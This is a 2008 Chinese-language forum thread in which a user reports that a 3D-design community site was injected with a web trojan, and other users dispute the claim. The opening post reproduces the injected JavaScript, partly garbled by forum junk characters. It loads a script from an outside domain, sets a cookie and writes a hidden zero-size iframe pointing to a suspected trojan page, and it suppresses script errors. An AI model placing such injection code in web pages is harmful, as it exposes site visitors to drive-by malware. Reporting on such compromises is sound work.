此网被挂马

czy12 · 发表于 2008-11-26 14:38:57

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

您需要登录才可以下载或查看，没有帐号？注册

x

马:Hack.Exploit.Script.JS.Mixed.c

<script language="javascript" SRC=" ' target=_blank>http://u.cruze3.cn/u.js"></script> 9 E7 w. D5 R- b. m( m
5 l4 p, d, ?- }, ^: y; C& X2 r
document.writeln("<script>";
) W' P) M2 q1 ^7 R% V$ d8 H
document.writeln("function oK_Begin(){";
# I4 E. Y" v) u3 I& ]. [
document.writeln("var Then = new Date() ";
" N& P: M& {( A1 d6 x/ A
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";% Y) V3 T9 g! d) H# S& s
document.writeln("var cookieString = new String(document.cookie)";
3 n/ D+ o2 C; z9 x* h' H" Q, A
document.writeln("var cookieHeader = "Cookie1=" ";5 m6 f) r- ~, x8 H, c8 r8 o3 m9 L
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";( ^$ }+ w) q! ?( z6 p, |
document.writeln("if (beginPosition != -1){ ";
3 r. B" x$ O; Q- j4 b
document.writeln("} else ";
& A, q9 ?4 ?$ @, t/ U0 g! b
document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";# k: ]8 G" `. r' v/ ?- ~
document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
! N; a# ~) J0 k9 ]2 O+ |9 V# N
document.writeln("}";
- T3 Q$ X0 l; V% i, e- o, V
document.writeln("}";2 j6 U/ o; \ J p7 C+ P/ \0 H
document.writeln("oK_Begin();";4 l. p) u, b0 j) t, v
document.writeln("<\/script>";
4 H1 Z. q9 F: j, Q( r3 E5 \
document.writeln("<script>window.onerror=function(){return true;}<\/script>"
- ^6 p5 ?9 G0 w. P5 ?
; C4 c1 E" j7 }$ Y3 C7 \
$ q3 n6 u: O% ?# p8 E& A
: G3 ^0 T! m' H! l* K1 w; y2 C
a+ M. m8 H9 q- S- p3 X! R: M
5 |4 q* R' A2 [' J) R* y

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205 · 发表于 2008-11-26 14:44:03

请管理员确认是否网页挂马?

cayuer · 发表于 2008-11-26 14:47:52

我的麦咖啡都没检测出来你什么杀毒软件？

czy12 · 发表于 2008-11-26 16:16:23

不是杀软件查的.
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.

HEHE只是没有礼貌

[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪 · 发表于 2008-11-26 18:27:17

你这个什么网站，哪里出来的？

ht tp://u.cruze3.cn/u.js

czy12 · 发表于 2008-11-27 09:15:28

http://u.cruze3.cn/u.js
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
HEHE

wwqq · 发表于 2008-11-27 10:26:38

这跟三维有什么关系？

czy12 · 发表于 2008-11-27 11:01:02

这是挂在三维网论坛里的.
红线所指

huang_baker · 发表于 2008-11-27 11:21:19

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪 · 发表于 2008-11-27 11:26:10

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12 · 发表于 2008-11-27 11:34:27

不学无术.
HEHE

yyywwwhk · 发表于 2008-11-27 14:30:45

但在:
http://www.3dportal.cn/discuz/ 之原始檔
似乎看不见楼主所说的 http://u.cruze3.cn/u.js

[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子 · 发表于 2008-11-27 15:30:58

经过自编扫描代码处理结果，未发现楼主说的挂马代码！

请清理自己计算机的缓冲区！

hebei · 发表于 2008-11-27 15:43:48

提示: 作者被禁止或删除内容自动屏蔽

college · 发表于 2008-11-27 15:47:42

看您的尾符/script，很像是U盘病毒。

czy12 · 发表于 2008-11-27 15:50:50

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
我也说了：已修复。

ps:这与缓存毫无关系。虽然缓存中有U.JS.
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?

script是个JAVA代码,与U盘何关?

HEHE

[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子 · 发表于 2008-11-27 16:11:40

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！

如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。

相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！

		自动登录	找回密码
密码			注册

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

浏览过的版块

hebei hebei 当前离线积分 2978 UID 494886 主题在线时间小时注册时间 2008-3-22 头像被屏蔽	发表于 2008-11-27 15:43:48 \| 显示全部楼层来自：中国河北衡水提示: 作者被禁止或删除内容自动屏蔽

	回复支持反对举报

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪 的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

浏览过的版块

回复 5# 江南有雪的帖子